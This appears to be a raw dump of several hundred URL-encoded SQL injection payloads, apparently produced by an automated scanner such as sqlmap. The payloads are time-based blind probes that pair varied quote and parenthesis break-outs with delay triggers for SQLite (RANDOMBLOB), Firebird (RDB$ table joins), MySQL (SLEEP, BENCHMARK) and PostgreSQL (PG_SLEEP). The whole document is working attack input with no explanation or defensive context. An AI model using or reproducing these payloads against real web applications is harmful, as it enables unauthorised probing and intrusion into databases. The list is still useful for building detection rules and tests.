1%22%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%22%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%22%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%22%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%22%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%22%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%25%27%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%25%27%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%25%27%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%25%27%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%00%27%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%00%27%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%29%20WHERE%202681%3D2681%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%22%29%20WHERE%204891%3D4891%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%20WHERE%203479%3D3479%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%22%20WHERE%206943%3D6943%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%7C%7C%28SELECT%20%27rJYQ%27%20FROM%20DUAL%20WHERE%202962%3D2962%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%7C%7C%28SELECT%20%27JOvB%27%20WHERE%209003%3D9003%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%2B%28SELECT%20Qkcw%20WHERE%206897%3D6897%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%2B%28SELECT%20%27bMrW%27%20WHERE%202613%3D2613%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%29%20WHERE%202784%3D2784%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%20WHERE%208422%3D8422%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%25%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%25%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%25%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%25%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%00%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%00%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%27%29%20WHERE%209832%3D9832%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%22%29%20WHERE%203856%3D3856%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%27%20WHERE%201547%3D1547%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%22%20WHERE%209153%3D9153%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%27%7C%7C%28SELECT%20%27HZFG%27%20FROM%20DUAL%20WHERE%206745%3D6745%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%27%7C%7C%28SELECT%20%27Peay%27%20WHERE%206468%3D6468%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%27%2B%28SELECT%20CCqn%20WHERE%203258%3D3258%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%27%2B%28SELECT%20%27LKvr%27%20WHERE%204440%3D4440%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- 1%29%20AND%20SLEEP%285%29 1%29%20AND%20SLEEP%285%29%20AND%20%286292%3D6292 1%29%29%20AND%20SLEEP%285%29%20AND%20%28%286425%3D6425 1%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%282246%3D2246 1%20AND%20SLEEP%285%29 1%29%20WHERE%206553%3D6553%20AND%20SLEEP%285%29%20--%20 1%20WHERE%203492%3D3492%20AND%20SLEEP%285%29%20--%20 1%27%29%20AND%20SLEEP%285%29 1%27%20AND%20SLEEP%285%29 1%22%20AND%20SLEEP%285%29 1%27%29%20AND%20SLEEP%285%29%20AND%20%28%27OOPA%27%3D%27OOPA 1%27%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%27Umvh%27%3D%27Umvh 1%27%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%27PYXK%27%3D%27PYXK 1%27%20AND%20SLEEP%285%29%20AND%20%27tRRN%27%3D%27tRRN 1%27%29%20AND%20SLEEP%285%29%20AND%20%28%27TLeK%27%20LIKE%20%27TLeK 1%27%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%27qpLC%27%20LIKE%20%27qpLC 1%27%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%27TwDr%27%20LIKE%20%27TwDr 1%27%20AND%20SLEEP%285%29%20AND%20%27zuDi%27%20LIKE%20%27zuDi 1%22%29%20AND%20SLEEP%285%29%20AND%20%28%22VFyj%22%3D%22VFyj 1%22%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%22KLFG%22%3D%22KLFG 1%22%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%22tzGP%22%3D%22tzGP 1%22%20AND%20SLEEP%285%29%20AND%20%22Vnzx%22%3D%22Vnzx 1%22%29%20AND%20SLEEP%285%29%20AND%20%28%22Fmxa%22%20LIKE%20%22Fmxa 1%22%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%22HxvS%22%20LIKE%20%22HxvS 1%22%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%22YBgm%22%20LIKE%20%22YBgm 1%22%20AND%20SLEEP%285%29%20AND%20%22lELd%22%20LIKE%20%22lELd 1%25%27%29%20AND%20SLEEP%285%29%20AND%20%28%27%25%27%3D%27 1%25%27%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20AND%20SLEEP%285%29%20AND%20%27%25%27%3D%27 1%00%27%29%20AND%20SLEEP%285%29%20AND%20%28%27ChEh%27%3D%27ChEh 1%00%27%20AND%20SLEEP%285%29%20AND%20%27eFRc%27%3D%27eFRc 1%27%29%20WHERE%207893%3D7893%20AND%20SLEEP%285%29%20--%20 1%22%29%20WHERE%208464%3D8464%20AND%20SLEEP%285%29%20--%20 1%27%20WHERE%203223%3D3223%20AND%20SLEEP%285%29%20--%20 1%22%20WHERE%202638%3D2638%20AND%20SLEEP%285%29%20--%20 1%27%7C%7C%28SELECT%20%27VyxN%27%20FROM%20DUAL%20WHERE%207069%3D7069%20AND%20SLEEP%285%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27yfDi%27%20WHERE%203810%3D3810%20AND%20SLEEP%285%29%20%29%7C%7C%27 1%27%2B%28SELECT%20oXdw%20WHERE%205187%3D5187%20AND%20SLEEP%285%29%20%29%2B%27 1%27%2B%28SELECT%20%27nYOt%27%20WHERE%205482%3D5482%20AND%20SLEEP%285%29%20%29%2B%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%20SLEEP%285%29%20%23 1%29%20AND%20SLEEP%285%29%23 1%29%20AND%20SLEEP%285%29%23 1%29%29%20AND%20SLEEP%285%29%23 1%29%29%29%20AND%20SLEEP%285%29%23 1%20AND%20SLEEP%285%29%23 1%29%20WHERE%206004%3D6004%20AND%20SLEEP%285%29%23 1%20WHERE%203954%3D3954%20AND%20SLEEP%285%29%23 1%27%29%20AND%20SLEEP%285%29%23 1%27%20AND%20SLEEP%285%29%23 1%22%20AND%20SLEEP%285%29%23 1%27%29%20AND%20SLEEP%285%29%23 1%27%29%29%20AND%20SLEEP%285%29%23 1%27%29%29%29%20AND%20SLEEP%285%29%23 1%27%20AND%20SLEEP%285%29%23 1%27%29%20AND%20SLEEP%285%29%23 1%27%29%29%20AND%20SLEEP%285%29%23 1%27%29%29%29%20AND%20SLEEP%285%29%23 1%27%20AND%20SLEEP%285%29%23 1%22%29%20AND%20SLEEP%285%29%23 1%22%29%29%20AND%20SLEEP%285%29%23 1%22%29%29%29%20AND%20SLEEP%285%29%23 1%22%20AND%20SLEEP%285%29%23 1%22%29%20AND%20SLEEP%285%29%23 1%22%29%29%20AND%20SLEEP%285%29%23 1%22%29%29%29%20AND%20SLEEP%285%29%23 1%22%20AND%20SLEEP%285%29%23 1%25%27%29%20AND%20SLEEP%285%29%23 1%25%27%29%29%20AND%20SLEEP%285%29%23 1%25%27%29%29%29%20AND%20SLEEP%285%29%23 1%25%27%20AND%20SLEEP%285%29%23 1%00%27%29%20AND%20SLEEP%285%29%23 1%00%27%20AND%20SLEEP%285%29%23 1%27%29%20WHERE%204523%3D4523%20AND%20SLEEP%285%29%23 1%22%29%20WHERE%203770%3D3770%20AND%20SLEEP%285%29%23 1%27%20WHERE%208904%3D8904%20AND%20SLEEP%285%29%23 1%22%20WHERE%201665%3D1665%20AND%20SLEEP%285%29%23 1%27%7C%7C%28SELECT%20%27uKgm%27%20FROM%20DUAL%20WHERE%208597%3D8597%20AND%20SLEEP%285%29%23 1%27%7C%7C%28SELECT%20%27DSwE%27%20WHERE%203800%3D3800%20AND%20SLEEP%285%29%23 1%27%2B%28SELECT%20kVgd%20WHERE%208295%3D8295%20AND%20SLEEP%285%29%23 1%27%2B%28SELECT%20%27KOtB%27%20WHERE%206308%3D6308%20AND%20SLEEP%285%29%23 1%27%20IN%20BOOLEAN%20MODE%29%20AND%20SLEEP%285%29%23 1%29%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29 1%29%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20AND%20%289332%3D9332 1%29%29%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20AND%20%28%285075%3D5075 1%29%29%29%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20AND%20%28%28%283313%3D3313 1%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29 1%29%20WHERE%207300%3D7300%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20--%20 1%20WHERE%209300%3D9300%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20--%20 1%27%29%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29 1%27%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29 1%22%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29 1%27%29%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20AND%20%28%27MbBP%27%3D%27MbBP 1%27%29%29%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20AND%20%28%28%27Bwyo%27%3D%27Bwyo 1%27%29%29%29%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20AND%20%28%28%28%27NoNu%27%3D%27NoNu 1%27%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20AND%20%27IoHr%27%3D%27IoHr 1%27%29%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20AND%20%28%27VmFM%27%20LIKE%20%27VmFM 1%27%29%29%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20AND%20%28%28%27PGwA%27%20LIKE%20%27PGwA 1%27%29%29%29%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20AND%20%28%28%28%27HqHI%27%20LIKE%20%27HqHI 1%27%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20AND%20%27HWRA%27%20LIKE%20%27HWRA 1%22%29%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20AND%20%28%22mmhy%22%3D%22mmhy 1%22%29%29%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20AND%20%28%28%22yhOR%22%3D%22yhOR 1%22%29%29%29%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20AND%20%28%28%28%22lNGI%22%3D%22lNGI 1%22%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20AND%20%22QYWW%22%3D%22QYWW 1%22%29%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20AND%20%28%22PXah%22%20LIKE%20%22PXah 1%22%29%29%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20AND%20%28%28%22ALFO%22%20LIKE%20%22ALFO 1%22%29%29%29%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20AND%20%28%28%28%22zlQt%22%20LIKE%20%22zlQt 1%22%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20AND%20%22VjFN%22%20LIKE%20%22VjFN 1%25%27%29%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20AND%20%28%27%25%27%3D%27 1%25%27%29%29%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20AND%20%27%25%27%3D%27 1%00%27%29%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20AND%20%28%27obrv%27%3D%27obrv 1%00%27%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20AND%20%27mfmN%27%3D%27mfmN 1%27%29%20WHERE%207460%3D7460%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20--%20 1%22%29%20WHERE%208177%3D8177%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20--%20 1%27%20WHERE%206499%3D6499%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20--%20 1%22%20WHERE%206070%3D6070%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20--%20 1%27%7C%7C%28SELECT%20%27uDkJ%27%20FROM%20DUAL%20WHERE%203271%3D3271%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27fHww%27%20WHERE%208932%3D8932%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20%29%7C%7C%27 1%27%2B%28SELECT%20wAQl%20WHERE%206252%3D6252%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20%29%2B%27 1%27%2B%28SELECT%20%27rjIf%27%20WHERE%201370%3D1370%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20%29%2B%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%207800%3DBENCHMARK%285000000%2CMD5%280x45746c54%29%29%20%23 1%29%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%29%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%29%29%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%29%29%29%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%29%20WHERE%206344%3D6344%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%20WHERE%206508%3D6508%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%27%29%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%27%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%22%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%27%29%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%27%29%29%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%27%29%29%29%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%27%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%27%29%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%27%29%29%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%27%29%29%29%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%27%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%22%29%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%22%29%29%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%22%29%29%29%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%22%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%22%29%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%22%29%29%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%22%29%29%29%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%22%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%25%27%29%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%25%27%29%29%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%25%27%29%29%29%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%25%27%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%00%27%29%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%00%27%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%27%29%20WHERE%201138%3D1138%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%22%29%20WHERE%206113%3D6113%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%27%20WHERE%203313%3D3313%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%22%20WHERE%201537%3D1537%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%27%7C%7C%28SELECT%20%27TjgG%27%20FROM%20DUAL%20WHERE%204669%3D4669%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%27%7C%7C%28SELECT%20%27lyfN%27%20WHERE%208070%3D8070%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%27%2B%28SELECT%20FoKL%20WHERE%204082%3D4082%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%27%2B%28SELECT%20%27xYhZ%27%20WHERE%209556%3D9556%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%27%20IN%20BOOLEAN%20MODE%29%20AND%203860%3DBENCHMARK%285000000%2CMD5%280x73505070%29%29%23 1%29%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29 